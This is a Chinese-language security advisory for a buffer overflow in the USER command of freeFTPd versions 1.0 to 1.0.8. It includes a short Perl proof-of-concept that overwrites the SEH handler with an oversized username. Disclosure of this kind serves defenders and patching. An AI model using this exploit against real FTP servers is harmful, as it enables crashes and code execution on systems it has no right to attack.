受影响系统：
freeFTPd freeFTPd 1.0.8
freeFTPd freeFTPd 1.0.7
freeFTPd freeFTPd 1.0.6
freeFTPd freeFTPd 1.0.5
freeFTPd freeFTPd 1.0.4
freeFTPd freeFTPd 1.0.3
freeFTPd freeFTPd 1.0.2
freeFTPd freeFTPd 1.0.1
freeFTPd freeFTPd 1.0
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 15457

FreeFTPd是一款基于WeOnlyDo FTP/SFTP实现的免费FTP+SSL/SFTP服务器。

由于没有正确的验证用户输入导致FreeFTPd中存在缓冲区溢出漏洞。成功利用这个漏洞的攻击者可以导致服务器崩溃，或以系统权限执行任意代码。

<*来源：mutsonline （barbsie@gmail.com）
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl -w
#freeftpd USER buffer overflow
#barabas - 2005

use strict;
use Net::FTP;
my $user="\x41"x1011;
$user .="\x44\x45\x46\x47";#overwrite SEH
$user .="\x50"x400;

my $ftp = Net::FTP->new("www.example.com <http://www.example.com>", Debug =>
1);
$ftp->login("$user","whatevah");

建议：
--------------------------------------------------------------------------------
厂商补丁：

freeFTPd
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://freeftpd.com/

·上一篇: Gmail存在巨大漏洞 Google隐瞒至今刚修复
·下一篇: Windows版iTunes存缺陷 黑客运行任意代码